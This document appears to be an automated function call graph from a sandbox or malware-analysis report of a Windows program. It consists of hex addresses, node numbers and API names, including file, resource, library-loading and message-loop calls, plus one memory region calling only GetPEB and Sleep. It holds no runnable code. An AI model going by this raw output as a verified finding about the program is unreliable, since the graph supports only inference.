95128->95149 95134 70909a 95132->95134 95132->95137 95176 708a61 31 API calls 4 library calls 95133->95176 95177 7088a1 29 API calls __wsopen_s 95134->95177 95137->95121 95138 70909f 95138->95137 95139->95045 95140->95049 95141->95056 95142->95055 95143->95064 95144->95066 95145->95049 95146->95047 95147->95055 95148->95049 95150 70f8b5 95149->95150 95151 70f8a8 95149->95151 95153 70f8c1 95150->95153 95184 6ff2d9 20 API calls __dosmaperr 95150->95184 95183 6ff2d9 20 API calls __dosmaperr 95151->95183 95153->95103 95155 70f8ad 95155->95103 95156 70f8e2 95185 7027ec 26 API calls __fread_nolock 95156->95185 95158->95080 95159->95084 95160->95089 95161->95087 95162->95097 95163->95102 95164->95137 95165->95101 95167 7029fc _free 95166->95167 95168 7029d3 RtlFreeHeap 95166->95168 95167->95105 95168->95167 95169 7029e8 95168->95169 95186 6ff2d9 20 API calls __dosmaperr 95169->95186 95171 7029ee GetLastError 95171->95167 95172->95126 95173->95137 95174->95128 95175->95137 95176->95137 95177->95138 95178->95127 95179->95137 95180->95082 95181->95087 95182->95084 95183->95155 95184->95156 95185->95155 95186->95171 95187 15c23b0 95201 15c0000 95187->95201 95189 15c248b 95204 15c22a0 95189->95204 95207 15c34b0 GetPEB 95201->95207 95203 15c068b 95203->95189 95205 15c22a9 Sleep 95204->95205 95206 15c22b7 95205->95206 95208 15c34da 95207->95208 95208->95203 95209 6d2de3 95210 6d2df0 __wsopen_s 95209->95210 95211 6d2e09 95210->95211 95212 712c2b ___scrt_fastfail 95210->95212 95225 6d3aa2 95211->95225 95214 712c47 GetOpenFileNameW 95212->95214 95216 712c96 95214->95216 95218 6d6b57 22 API calls 95216->95218 95221 712cab 95218->95221 95221->95221 95222 6d2e27 95253 6d44a8 95222->95253 95282 711f50 95225->95282 95228 6d3ace 95230 6d6b57 22 API calls 95228->95230 95229 6d3ae9 95288 6da6c3 95229->95288 95232 6d3ada 95230->95232 95284 6d37a0 95232->95284 95235 6d2da5 95236 711f50 __wsopen_s 95235->95236 95237 6d2db2 GetLongPathNameW 95236->95237 95238 6d6b57 22 API calls 95237->95238 95239 6d2dda 95238->95239 95240 6d3598 95239->95240 95241 6da961 22 API calls 95240->95241 95242 6d35aa 95241->95242 95243 6d3aa2 23 API calls 95242->95243 95244 6d35b5 95243->95244 95245 6d35c0 95244->95245 95249 7132eb 95244->95249 95294 6d515f 95245->95294 95251 71330d 95249->95251 95306 6ece60 41 API calls 95249->95306 95252 6d35df 95252->95222 95307 6d4ecb 95253->95307 95256 713833 95329 742cf9 95256->95329 95257 6d4ecb 94 API calls 95259 6d44e1 95257->95259 95259->95256 95261 6d44e9 95259->95261 95260 713848 95262 713869 95260->95262 95263 71384c 95260->95263 95265 713854 95261->95265 95266 6d44f5 95261->95266 95264 6efe0b 22 API calls 95262->95264 95370 6d4f39 95263->95370 95281 7138ae 95264->95281 95376 73da5a 82 API calls 95265->95376 95369 6d940c 136 API calls 2 library calls 95266->95369 95270 6d2e31 95271 713862 95271->95262 95272 713a5f 95273 6d4f39 68 API calls 95272->95273 95380 73989b 82 API calls __wsopen_s 95272->95380 95273->95272 95278 6d9cb3 22 API calls 95278->95281 95281->95272 95281->95278 95355 6da4a1 95281->95355 95363 6d3ff7 95281->95363 95377 73967e 22 API calls __fread_nolock 95281->95377 95378 7395ad 42 API calls _wcslen 95281->95378 95379 740b5a 22 API calls 95281->95379 95283 6d3aaf GetFullPathNameW 95282->95283 95283->95228 95283->95229 95285 6d37ae 95284->95285 95286 6d93b2 22 API calls 95285->95286 95287 6d2e12 95286->95287 95287->95235 95289 6da6dd 95288->95289 95290 6da6d0 95288->95290 95291 6efddb 22 API calls 95289->95291 95290->95232 95292 6da6e7 95291->95292 95293 6efe0b 22 API calls 95292->95293 95293->95290 95295 6d516e 95294->95295 95299 6d518f __fread_nolock 95294->95299 95297 6efe0b 22 API calls 95295->95297 95296 6efddb 22 API calls 95298 6d35cc 95296->95298 95297->95299 95300 6d35f3 95298->95300 95299->95296 95301 6d3605 95300->95301 95305 6d3624 __fread_nolock 95300->95305 95303 6efe0b 22 API calls 95301->95303 95302 6efddb 22 API calls 95304 6d363b 95302->95304 95303->95305 95304->95252 95305->95302 95306->95249 95381 6d4e90 LoadLibraryA 95307->95381 95312 6d4ef6 LoadLibraryExW 95389 6d4e59 LoadLibraryA 95312->95389 95313 713ccf 95314 6d4f39 68 API calls 95313->95314 95316 713cd6 95314->95316 95318 6d4e59 3 API calls 95316->95318 95320 713cde 95318->95320 95411 6d50f5 95320->95411 95321 6d4f20 95321->95320 95322 6d4f2c 95321->95322 95324 6d4f39 68 API calls 95322->95324 95326 6d44cd 95324->95326 95326->95256 95326->95257 95328 713d05 95330 742d15 95329->95330 95331 6d511f 64 API calls 95330->95331 95332 742d29 95331->95332 95570 742e66 95332->95570 95335 6d50f5 40 API calls 95336 742d56 95335->95336 95337 6d50f5 40 API calls 95336->95337 95338 742d66 95337->95338 95339 6d50f5 40 API calls 95338->95339 95340 742d81 95339->95340 95341 6d50f5 40 API calls 95340->95341 95342 742d9c 95341->95342 95343 6d511f 64 API calls 95342->95343 95344 742db3 95343->95344 95345 6fea0c ___std_exception_copy 21 API calls 95344->95345 95346 742dba 95345->95346 95347 6fea0c ___std_exception_copy 21 API calls 95346->95347 95348 742dc4 95347->95348 95349 6d50f5 40 API calls 95348->95349 95350 742dd8 95349->95350 95351 7428fe 27 API calls 95350->95351 95352 742dee 95351->95352 95353 742d3f 95352->95353 95576 7422ce 95352->95576 95353->95260 95356 6da52b 95355->95356 95361 6da4b1 __fread_nolock 95355->95361 95358 6efe0b 22 API calls 95356->95358 95357 6efddb 22 API calls 95359 6da4b8 95357->95359 95358->95361 95360 6efddb 22 API calls 95359->95360 95362 6da4d6 95359->95362 95360->95362 95361->95357 95362->95281 95364 6d40ae 95363->95364 95365 6d400a 95363->95365 95364->95281 95366 6efe0b 22 API calls 95365->95366 95368 6d403c 95365->95368 95366->95368 95367 6efddb 22 API calls 95367->95368 95368->95364 95368->95367 95369->95270 95371 6d4f43 95370->95371 95373 6d4f4a 95370->95373 95372 6fe678 67 API calls 95371->95372 95372->95373 95374 6d4f59 95373->95374 95375 6d4f6a FreeLibrary 95373->95375 95374->95265 95375->95374 95376->95271 95377->95281 95378->95281 95379->95281 95380->95272 95382 6d4ea8 GetProcAddress 95381->95382 95383 6d4ec6 95381->95383 95384 6d4eb8 95382->95384 95386 6fe5eb 95383->95386 95384->95383 95385 6d4ebf FreeLibrary 95384->95385 95385->95383 95419 6fe52a 95386->95419 95388 6d4eea 95388->95312 95388->95313 95390 6d4e8d 95389->95390 95391 6d4e6e GetProcAddress 95389->95391 95394 6d4f80 95390->95394 95392 6d4e7e 95391->95392 95392->95390 95393 6d4e86 FreeLibrary 95392->95393 95393->95390 95395 6efe0b 22 API calls 95394->95395 95396 6d4f95 95395->95396 95480 6d5722 95396->95480 95398 6d4fa1 __fread_nolock 95399 6d4fdc 95398->95399 95400 6d50a5 95398->95400 95401 713d1d 95398->95401 95404 713d22 95399->95404 95405 6d50f5 40 API calls 95399->95405 95409 6d506e ISource 95399->95409 95489 6d511f 95399->95489 95483 6d42a2 CreateStreamOnHGlobal 95400->95483 95494 74304d 74 API calls 95401->95494 95406 6d511f 64 API calls 95404->95406 95405->95399 95407 713d45 95406->95407 95408 6d50f5 40 API calls 95407->95408 95408->95409 95409->95321 95412 6d5107 95411->95412 95415 713d70 95411->95415 95516 6fe8c4 95412->95516 95416 7428fe 95553 74274e 95416->95553 95418 742919 95418->95328 95421 6fe536 ___scrt_is_nonwritable_in_current_image 95419->95421 95420 6fe544 95444 6ff2d9 20 API calls __dosmaperr 95420->95444 95421->95420 95424 6fe574 95421->95424 95423 6fe549 95445 7027ec 26 API calls __fread_nolock 95423->95445 95426 6fe579 95424->95426 95427 6fe586 95424->95427 95446 6ff2d9 20 API calls __dosmaperr 95426->95446 95436 708061 95427->95436 95430 6fe554 __fread_nolock 95430->95388 95431 6fe58f 95432 6fe595 95431->95432 95433 6fe5a2 95431->95433 95447 6ff2d9 20 API calls __dosmaperr 95432->95447 95448 6fe5d4 LeaveCriticalSection __fread_nolock 95433->95448 95437 70806d ___scrt_is_nonwritable_in_current_image 95436->95437 95449 702f5e EnterCriticalSection 95437->95449 95439 70807b 95450 7080fb 95439->95450 95443 7080ac __fread_nolock 95443->95431 95444->95423 95445->95430 95446->95430 95447->95430 95448->95430 95449->95439 95459 70811e 95450->95459 95451 708177 95468 704c7d 95451->95468 95452 708088 95463 7080b7 95452->95463 95456 7029c8 _free 20 API calls 95457 708189 95456->95457 95457->95452 95475 703405 11 API calls 2 library calls 95457->95475 95459->95451 95459->95452 95466 6f918d EnterCriticalSection 95459->95466 95467 6f91a1 LeaveCriticalSection 95459->95467 95460 7081a8 95476 6f918d EnterCriticalSection 95460->95476 95479 702fa6 LeaveCriticalSection 95463->95479 95465 7080be 95465->95443 95466->95459 95467->95459 95473 704c8a __dosmaperr 95468->95473 95469 704cca 95478 6ff2d9 20 API calls __dosmaperr 95469->95478 95470 704cb5 RtlAllocateHeap 95472 704cc8 95470->95472 95470->95473 95472->95456 95473->95469 95473->95470 95477 6f4ead 7 API calls 2 library calls 95473->95477 95475->95460 95476->95452 95477->95473 95478->95472 95479->95465 95481 6efddb 22 API calls 95480->95481 95482 6d5734 95481->95482 95482->95398 95484 6d42bc FindResourceExW 95483->95484 95488 6d42d9 95483->95488 95485 7135ba LoadResource 95484->95485 95484->95488 95486 7135cf SizeofResource 95485->95486 95485->95488 95487 7135e3 LockResource 95486->95487 95486->95488 95487->95488 95488->95399 95490 713d90 95489->95490 95491 6d512e 95489->95491 95495 6fece3 95491->95495 95494->95404 95498 6feaaa 95495->95498 95497 6d513c 95497->95399 95499 6feab6 ___scrt_is_nonwritable_in_current_image 95498->95499 95500 6feac2 95499->95500 95502 6feae8 95499->95502 95511 6ff2d9 20 API calls __dosmaperr 95500->95511 95513 6f918d EnterCriticalSection 95502->95513 95503 6feac7 95512 7027ec 26 API calls __fread_nolock 95503->95512 95506 6feaf4 95514 6fec0a 62 API calls 2 library calls 95506->95514 95508 6feb08 95515 6feb27 LeaveCriticalSection __fread_nolock 95508->95515 95510 6fead2 __fread_nolock 95510->95497 95511->95503 95512->95510 95513->95506 95514->95508 95515->95510 95519 6fe8e1 95516->95519 95518 6d5118 95518->95416 95520 6fe8ed ___scrt_is_nonwritable_in_current_image 95519->95520 95521 6fe92d 95520->95521 95522 6fe900 ___scrt_fastfail 95520->95522 95523 6fe925 __fread_nolock 95520->95523 95532 6f918d EnterCriticalSection 95521->95532 95546 6ff2d9 20 API calls __dosmaperr 95522->95546 95523->95518 95526 6fe937 95533 6fe6f8 95526->95533 95528 6fe91a 95547 7027ec 26 API calls __fread_nolock 95528->95547 95532->95526 95537 6fe70a ___scrt_fastfail 95533->95537 95539 6fe727 95533->95539 95534 6fe717 95549 6ff2d9 20 API calls __dosmaperr 95534->95549 95536 6fe71c 95550 7027ec 26 API calls __fread_nolock 95536->95550 95537->95534 95537->95539 95541 6fe76a __fread_nolock 95537->95541 95548 6fe96c LeaveCriticalSection __fread_nolock 95539->95548 95540 6fe886 ___scrt_fastfail 95552 6ff2d9 20 API calls __dosmaperr 95540->95552 95541->95539 95541->95540 95543 6fd955 __fread_nolock 26 API calls 95541->95543 95545 708d45 __fread_nolock 38 API calls 95541->95545 95551 6fcf78 26 API calls 3 library calls 95541->95551 95543->95541 95545->95541 95546->95528 95547->95523 95548->95523 95549->95536 95550->95539 95551->95541 95552->95536 95556 6fe4e8 95553->95556 95555 74275d 95555->95418 95559 6fe469 95556->95559 95558 6fe505 95558->95555 95560 6fe48c 95559->95560 95561 6fe478 95559->95561 95566 6fe488 __alldvrm 95560->95566 95569 70333f 11 API calls 2 library calls 95560->95569 95567 6ff2d9 20 API calls __dosmaperr 95561->95567 95563 6fe47d 95568 7027ec 26 API calls __fread_nolock 95563->95568 95566->95558 95567->95563 95568->95566 95569->95566 95574 742e7a 95570->95574 95571 742d3b 95571->95335 95571->95353 95572 6d50f5 40 API calls 95572->95574 95573 7428fe 27 API calls 95573->95574 95574->95571 95574->95572 95574->95573 95575 6d511f 64 API calls 95574->95575 95575->95574 95577 7422e7 95576->95577 95578 7422d9 95576->95578 95580 74232c 95577->95580 95581 6fe5eb 29 API calls 95577->95581 95604 7422f0 95577->95604 95579 6fe5eb 29 API calls 95578->95579 95579->95577 95605 742557 95580->95605 95582 742311 95581->95582 95582->95580 95584 74231a 95582->95584 95588 6fe678 67 API calls 95584->95588 95584->95604 95585 742370 95586 742374 95585->95586 95587 742395 95585->95587 95590 742381 95586->95590 95592 6fe678 67 API calls 95586->95592 95609 742171 95587->95609 95588->95604 95593 6fe678 67 API calls 95590->95593 95590->95604 95591 74239d 95594 7423c3 95591->95594 95595 7423a3 95591->95595 95592->95590 95593->95604 95616 7423f3 95594->95616 95597 7423b0 95595->95597 95598 6fe678 67 API calls 95595->95598 95599 6fe678 67 API calls 95597->95599 95597->95604 95598->95597 95599->95604 95600 7423ca 95601 7423de 95600->95601 95624 6fe678 95600->95624 95603 6fe678 67 API calls 95601->95603 95601->95604 95603->95604 95604->95353 95606 74257c 95605->95606 95608 742565 __fread_nolock 95605->95608 95607 6fe8c4 __fread_nolock 40 API calls 95606->95607 95607->95608 95608->95585 95610 6fea0c ___std_exception_copy 21 API calls 95609->95610 95611 74217f 95610->95611 95612 6fea0c ___std_exception_copy 21 API calls 95611->95612 95613 742190 95612->95613 95614 6fea0c ___std_exception_copy 21 API calls 95613->95614 95615 74219c 95614->95615 95615->95591 95623 742408 95616->95623 95617 7424c0 95637 742724 95617->95637 95618 7421cc 40 API calls 95618->95623 95620 7424c7 95620->95600 95623->95617 95623->95618 95623->95620 95641 742269 40 API calls 95623->95641 95642 742606 65 API calls 95623->95642 95625 6fe684 ___scrt_is_nonwritable_in_current_image 95624->95625 95626 6fe695 95625->95626 95627 6fe6aa 95625->95627 95712 6ff2d9 20 API calls __dosmaperr 95626->95712 95636 6fe6a5 __fread_nolock 95627->95636 95695 6f918d EnterCriticalSection 95627->95695 95630 6fe69a 95713 7027ec 26 API calls __fread_nolock 95630->95713 95631 6fe6c6 95696 6fe602 95631->95696 95634 6fe6d1 95714 6fe6ee LeaveCriticalSection __fread_nolock 95634->95714 95636->95601 95638 742731 95637->95638 95639 742742 95637->95639 95643 6fdbb3 95638->95643 95639->95620 95641->95623 95642->95623 95644 6fdbc1 95643->95644 95645 6fdbdd 95643->95645 95644->95645 95646 6fdbcd 95644->95646 95647 6fdbe3 95644->95647 95645->95639 95655 6ff2d9 20 API calls __dosmaperr 95646->95655 95652 6fd9cc 95647->95652 95650 6fdbd2 95656 7027ec 26 API calls __fread_nolock 95650->95656 95657 6fd97b 95652->95657 95655->95650 95656->95645 95658 6fd987 ___scrt_is_nonwritable_in_current_image 95657->95658 95665 6f918d EnterCriticalSection 95658->95665 95660 6fd995 95666 6fd9f4 95660->95666 95665->95660 95674 7049a1 95666->95674 95675 6fd955 __fread_nolock 26 API calls 95674->95675 95676 7049b0 95675->95676 95677 70f89b __fread_nolock 26 API calls 95676->95677 95695->95631 95697 6fe60f 95696->95697 95698 6fe624 95696->95698 95740 6ff2d9 20 API calls __dosmaperr 95697->95740 95703 6fe61f 95698->95703 95715 6fdc0b 95698->95715 95700 6fe614 95741 7027ec 26 API calls __fread_nolock 95700->95741 95703->95634 95707 6fd955 __fread_nolock 26 API calls 95708 6fe646 95707->95708 95725 70862f 95708->95725 95712->95630 95713->95636 95714->95636 95716 6fdc1f 95715->95716 95717 6fdc23 95715->95717 95721 704d7a 95716->95721 95717->95716 95718 6fd955 __fread_nolock 26 API calls 95717->95718 95719 6fdc43 95718->95719 95742 7059be 95719->95742 95722 704d90 95721->95722 95723 6fe640 95721->95723 95722->95723 95724 7029c8 _free 20 API calls 95722->95724 95723->95707 95724->95723 95740->95700 95741->95703 95743 7059ca ___scrt_is_nonwritable_in_current_image 95742->95743 95744 7059d2 95743->95744 95745 7059ea 95743->95745 95747 705a88 95745->95747 95751 705a1f 95745->95751 95914 72d8dd GetTempPathW 95915 72d8fa 95914->95915 95915->95915 95916 6ddddc 95919 6db710 95916->95919 95920 6db72b 95919->95920 95921 720146 95920->95921 95922 7200f8 95920->95922 95949 6db750 95920->95949 95961 7558a2 235 API calls 2 library calls 95921->95961 95925 720102 95922->95925 95928 72010f 95922->95928 95922->95949 95959 755d33 235 API calls 95925->95959 95945 6dba20 95928->95945 95960 7561d0 235 API calls 2 library calls 95928->95960 95931 6ed336 40 API calls 95931->95949 95932 7203d9 95932->95932 95936 720322 95964 755c0c 82 API calls 95936->95964 95940 6dba4e 95944 6dbbe0 40 API calls 95944->95949 95945->95940 95965 74359c 82 API calls __wsopen_s 95945->95965 95946 6dec40 235 API calls 95946->95949 95947 6da8c7 22 API calls 95947->95949 95949->95931 95949->95936 95949->95940 95949->95944 95949->95945 95949->95946 95949->95947 95950 6da81b 41 API calls 95949->95950 95951 6ed2f0 40 API calls 95949->95951 95952 6ea01b 235 API calls 95949->95952 95953 6f0242 5 API calls __Init_thread_wait 95949->95953 95954 6eedcd 22 API calls 95949->95954 95955 6f00a3 29 API calls __onexit 95949->95955 95956 6f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95949->95956 95957 6eee53 82 API calls 95949->95957 95958 6ee5ca 235 API calls 95949->95958 95962 6daceb 23 API calls ISource 95949->95962 95963 72f6bf 23 API calls 95949->95963 95950->95949 95951->95949 95952->95949 95953->95949 95954->95949 95955->95949 95956->95949 95957->95949 95958->95949 95959->95928 95960->95945 95961->95949 95962->95949 95963->95949 95964->95945 95965->95932 95966 722a00 95980 6dd7b0 ISource 95966->95980 95967 6ddb11 PeekMessageW 95967->95980 95968 6dd807 GetInputState 95968->95967 95968->95980 95970 721cbe TranslateAcceleratorW 95970->95980 95971 6dda04 timeGetTime 95971->95980 95972 6ddb8f PeekMessageW 95972->95980 95973 6ddb73 TranslateMessage DispatchMessageW 95973->95972 95974 6ddbaf Sleep 95988 6ddbc0 95974->95988 95975 722b74 Sleep 95975->95988 95976 6ee551 timeGetTime 95976->95988 95977 721dda timeGetTime 96087 6ee300 23 API calls 95977->96087 95980->95967 95980->95968 95980->95970 95980->95971 95980->95972 95980->95973 95980->95974 95980->95975 95980->95977 95983 6dd9d5 95980->95983 95994 6dec40 235 API calls 95980->95994 95996 6dbf40 235 API calls 95980->95996 95998 6ddd50 95980->95998 96005 6ddfd0 95980->96005 96028 6e1310 95980->96028 96086 6eedf6 IsDialogMessageW GetClassLongW 95980->96086 96088 743a2a 23 API calls 95980->96088 96089 74359c 82 API calls __wsopen_s 95980->96089 95981 722c0b GetExitCodeProcess 95986 722c21 WaitForSingleObject 95981->95986 95987 722c37 CloseHandle 95981->95987 95982 722a31 95982->95983 95984 7629bf GetForegroundWindow 95984->95988 95986->95980 95986->95987 95987->95988 95988->95976 95988->95980 95988->95981 95988->95982 95988->95983 95988->95984 95989 722ca9 Sleep 95988->95989 96090 755658 23 API calls 95988->96090 96091 73e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 95988->96091 96092 73d4dc 47 API calls 95988->96092 95989->95980 95994->95980 95996->95980 95999 6ddd6f 95998->95999 96000 6ddd83 95998->96000 96093 6dd260 235 API calls 2 library calls 95999->96093 96094 74359c 82 API calls __wsopen_s 96000->96094 96003 6ddd7a 96003->95980 96004 722f75 96004->96004 96006 6de010 96005->96006 96022 6de0dc ISource 96006->96022 96097 6f0242 5 API calls __Init_thread_wait 96006->96097 96009 722fca 96011 6da961 22 API calls 96009->96011 96009->96022 96010 6da961 22 API calls 96010->96022 96012 722fe4 96011->96012 96098 6f00a3 29 API calls __onexit 96012->96098 96016 722fee 96099 6f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96016->96099 96020 6dec40 235 API calls 96020->96022 96021 6da8c7 22 API calls 96021->96022 96022->96010 96022->96020 96022->96021 96023 74359c 82 API calls 96022->96023 96024 6de3e1 96022->96024 96025 6e04f0 22 API calls 96022->96025 96095 6da81b 41 API calls 96022->96095 96096 6ea308 235 API calls 96022->96096 96100 6f0242 5 API calls __Init_thread_wait 96022->96100 96101 6f00a3 29 API calls __onexit 96022->96101 96102 6f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96022->96102 96103 7547d4 235 API calls 96022->96103 96104 7568c1 235 API calls 96022->96104 96023->96022 96024->95980 96025->96022 96029 6e1376 96028->96029 96030 6e17b0 96028->96030 96031 726331 96029->96031 96032 6e1390 96029->96032 96212 6f0242 5 API calls __Init_thread_wait 96030->96212 96223 75709c 235 API calls 96031->96223 96035 6e1940 9 API calls 96032->96035 96034 6e17ba 96038 6e17fb 96034->96038 96213 6d9cb3 96034->96213 96039 6e13a0 96035->96039 96037 72633d 96037->95980 96043 726346 96038->96043 96045 6e182c 96038->96045 96041 6e1940 9 API calls 96039->96041 96042 6e13b6 96041->96042 96042->96038 96044 6e13ec 96042->96044 96224 74359c 82 API calls __wsopen_s 96043->96224 96044->96043 96068 6e1408 __fread_nolock 96044->96068 96220 6daceb 23 API calls ISource 96045->96220 96048 6e1839 96221 6ed217 235 API calls 96048->96221 96049 6e17d4 96219 6f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96049->96219 96052 72636e 96225 74359c 82 API calls __wsopen_s 96052->96225 96053 6e152f 96055 6e153c 96053->96055 96056 7263d1 96053->96056 96058 6e1940 9 API calls 96055->96058 96227 755745 54 API calls _wcslen 96056->96227 96060 6e1549 96058->96060 96059 6efddb 22 API calls 96059->96068 96063 7264fa 96060->96063 96065 6e1940 9 API calls 96060->96065 96061 6e1872 96222 6efaeb 23 API calls 96061->96222 96062 6efe0b 22 API calls 96062->96068 96072 726369 96063->96072 96228 74359c 82 API calls __wsopen_s 96063->96228 96070 6e1563 96065->96070 96067 6dec40 235 API calls 96067->96068 96068->96048 96068->96052 96068->96053 96068->96059 96068->96062 96068->96067 96069 7263b2 96068->96069 96068->96072 96226 74359c 82 API calls __wsopen_s 96069->96226 96070->96063 96073 6da8c7 22 API calls 96070->96073 96075 6e15c7 ISource 96070->96075 96072->95980 96073->96075 96074 6e1940 9 API calls 96074->96075 96075->96061 96075->96063 96075->96072 96075->96074 96078 6e167b ISource 96075->96078 96079 6d4f39 68 API calls 96075->96079 96105 759c4d 96075->96105 96113 746ef1 96075->96113 96193 75959f 96075->96193 96196 74f0ec 96075->96196 96205 75958b 96075->96205 96208 73d4ce 96075->96208 96076 6e171d 96076->95980 96078->96076 96211 6ece17 22 API calls ISource 96078->96211 96079->96075 96086->95980 96087->95980 96088->95980 96089->95980 96090->95988 96091->95988 96092->95988 96093->96003 96094->96004 96095->96022 96096->96022 96097->96009 96098->96016 96099->96022 96100->96022 96101->96022 96102->96022 96103->96022 96104->96022 96106 759ca8 96105->96106 96112 759c68 96105->96112 96107 759cc6 96106->96107 96261 6db567 39 API calls 96106->96261 96110 759d23 96107->96110 96107->96112 96262 6db567 39 API calls 96107->96262 96229 73f9b8 96110->96229 96112->96075 96114 6da961 22 API calls 96113->96114 96115 746f1d 96114->96115 96116 6da961 22 API calls 96115->96116 96117 746f26 96116->96117 96118 746f3a 96117->96118 96571 6db567 39 API calls 96117->96571 96120 6d7510 53 API calls 96118->96120 96121 746f57 _wcslen 96120->96121 96122 746fbc 96121->96122 96123 7470bf 96121->96123 96192 7470e9 96121->96192 96125 6d7510 53 API calls 96122->96125 96124 6d4ecb 94 API calls 96123->96124 96127 7470d0 96124->96127 96126 746fc8 96125->96126 96130 6da8c7 22 API calls 96126->96130 96135 746fdb 96126->96135 96128 7470e5 96127->96128 96131 6d4ecb 94 API calls 96127->96131 96129 6da961 22 API calls 96128->96129 96128->96192 96132 74711a 96129->96132 96130->96135 96131->96128 96133 6da961 22 API calls 96132->96133 96137 747126 96133->96137 96134 747027 96136 6d7510 53 API calls 96134->96136 96135->96134 96138 747005 96135->96138 96141 6da8c7 22 API calls 96135->96141 96139 747034 96136->96139 96140 6da961 22 API calls 96137->96140 96572 6d33c6 96138->96572 96143 747047 96139->96143 96144 74703d 96139->96144 96145 74712f 96140->96145 96141->96138 96581 73e199 GetFileAttributesW 96143->96581 96147 6da8c7 22 API calls 96144->96147 96149 6da961 22 API calls 96145->96149 96146 74700f 96150 6d7510 53 API calls 96146->96150 96147->96143 96152 747138 96149->96152 96153 74701b 96150->96153 96151 747050 96154 747063 96151->96154 96157 6d4c6d 22 API calls 96151->96157 96155 6d7510 53 API calls 96152->96155 96156 6d6350 22 API calls 96153->96156 96159 6d7510 53 API calls 96154->96159 96164 747069 96154->96164 96158 747145 96155->96158 96156->96134 96157->96154 96411 6d525f 96158->96411 96160 7470a0 96159->96160 96582 73d076 57 API calls 96160->96582 96163 747166 96165 6d4c6d 22 API calls 96163->96165 96164->96192 96166 747175 96165->96166 96167 7471a9 96166->96167 96169 6d4c6d 22 API calls 96166->96169 96168 6da8c7 22 API calls 96167->96168 96171 7471ba 96168->96171 96170 747186 96169->96170 96170->96167 96173 6d6b57 22 API calls 96170->96173 96453 6d6350 96171->96453 96175 74719b 96173->96175 96177 6d6b57 22 API calls 96175->96177 96176 6d6350 22 API calls 96178 7471d6 96176->96178 96177->96167 96179 6d6350 22 API calls 96178->96179 96180 7471e4 96179->96180 96181 6d7510 53 API calls 96180->96181 96182 7471f0 96181->96182 96462 73d7bc 96182->96462 96184 747201 96185 73d4ce 4 API calls 96184->96185 96186 74720b 96185->96186 96187 6d7510 53 API calls 96186->96187 96191 747239 96186->96191 96188 747229 96187->96188 96516 742947 96188->96516 96190 6d4f39 68 API calls 96190->96192 96191->96190 96192->96075 96618 757f59 96193->96618 96195 7595af 96195->96075 96197 6d7510 53 API calls 96196->96197 96198 74f126 96197->96198 96710 6d9e90 96198->96710 96200 74f136 96201 74f15b 96200->96201 96202 6dec40 235 API calls 96200->96202 96203 6d9c6e 22 API calls 96201->96203 96204 74f15f 96201->96204 96202->96201 96203->96204 96204->96075 96206 757f59 120 API calls 96205->96206 96207 75959b 96206->96207 96207->96075 96750 73dbbe lstrlenW 96208->96750 96211->96078 96212->96034 96214 6d9cc2 _wcslen 96213->96214 96215 6efe0b 22 API calls 96214->96215 96216 6d9cea __fread_nolock 96215->96216 96217 6efddb 22 API calls 96216->96217 96218 6d9d00 96217->96218 96218->96049 96219->96038 96220->96048 96221->96061 96222->96061 96223->96037 96224->96072 96225->96072 96226->96072 96227->96070 96228->96072 96263 73f8f0 96229->96263 96232 73fa51 96235 73fab7 96232->96235 96238 73fa61 96232->96238 96233 73fa39 96270 73fc2f 96233->96270 96236 73fae7 96235->96236 96237 73fb4d 96235->96237 96243 73f9df __fread_nolock 96235->96243 96239 73fb17 96236->96239 96240 73faec 96236->96240 96241 73fbf6 96237->96241 96242 73fb56 96237->96242 96260 73fa99 96238->96260 96326 741e96 24 API calls 96238->96326 96239->96243 96331 6db6b5 39 API calls 96239->96331 96240->96243 96330 6db6b5 39 API calls 96240->96330 96241->96243 96335 6db38f 39 API calls 96241->96335 96244 73fbd3 96242->96244 96245 73fb5b 96242->96245 96243->96112 96244->96243 96334 6db38f 39 API calls 96244->96334 96250 73fb61 96245->96250 96251 73fb9a 96245->96251 96250->96243 96332 6db38f 39 API calls 96250->96332 96251->96243 96333 6db38f 39 API calls 96251->96333 96255 73fa6d 96327 741e96 24 API calls 96255->96327 96258 73fa84 __fread_nolock 96328 741e96 24 API calls 96258->96328 96329 740e85 22 API calls ___scrt_fastfail 96260->96329 96261->96107 96262->96110 96264 73f93d 96263->96264 96268 73f901 96263->96268 96360 6db567 39 API calls 96264->96360 96265 73f93b 96265->96232 96265->96233 96265->96243 96268->96265 96336 6d7510 96268->96336 96359 6f4a28 40 API calls 3 library calls 96268->96359 96271 73fda3 96270->96271 96272 73fc43 96270->96272 96274 6da961 22 API calls 96271->96274 96272->96271 96273 73fc4d 96272->96273 96275 73fc63 96273->96275 96276 73fd1a 96273->96276 96277 73fdab 96274->96277 96278 6da961 22 API calls 96275->96278 96279 73fd1e 96276->96279 96280 73fd5d 96276->96280 96281 73fdb1 96277->96281 96289 73fe20 __fread_nolock 96277->96289 96283 73fc6b 96278->96283 96284 6efe0b 22 API calls 96279->96284 96282 6efe0b 22 API calls 96280->96282 96290 73fdc9 96281->96290 96291 73fdbf 96281->96291 96285 73fd76 __fread_nolock 96282->96285 96286 6d7510 53 API calls 96283->96286 96287 73fd27 __fread_nolock 96284->96287 96297 6d9c6e 22 API calls 96285->96297 96288 73fc75 96286->96288 96365 73ebd1 96287->96365 96294 73fc81 96288->96294 96295 73fcd9 96288->96295 96408 73f24a 22 API calls 96289->96408 96293 6d7510 53 API calls 96290->96293 96402 6db567 39 API calls 96291->96402 96296 73fdc4 96293->96296 96298 73fc8c 96294->96298 96302 6d7510 53 API calls 96294->96302 96299 73fce6 96295->96299 96303 6d7510 53 API calls 96295->96303 96403 73f24a 22 API calls 96296->96403 96325 73fcbf __fread_nolock 96297->96325 96305 6d7510 53 API calls 96298->96305 96307 6d7510 53 API calls 96299->96307 96302->96298 96303->96299 96310 73fc9a 96305->96310 96306 73fe5e 96409 6d62b5 22 API calls 96306->96409 96312 73fcf4 96307->96312 96386 6d6d25 96310->96386 96315 6d6d25 22 API calls 96312->96315 96313 73fddf 96404 6d62b5 22 API calls 96313->96404 96318 73fd02 96315->96318 96317 73fca8 96399 6d62b5 22 API calls 96317->96399 96401 6d62b5 22 API calls 96318->96401 96320 73fdeb 96405 6d4c6d 96320->96405 96322 73fcb4 96400 73efae 24 API calls _wcslen 96322->96400 96325->96243 96326->96255 96327->96258 96328->96260 96329->96243 96330->96243 96331->96243 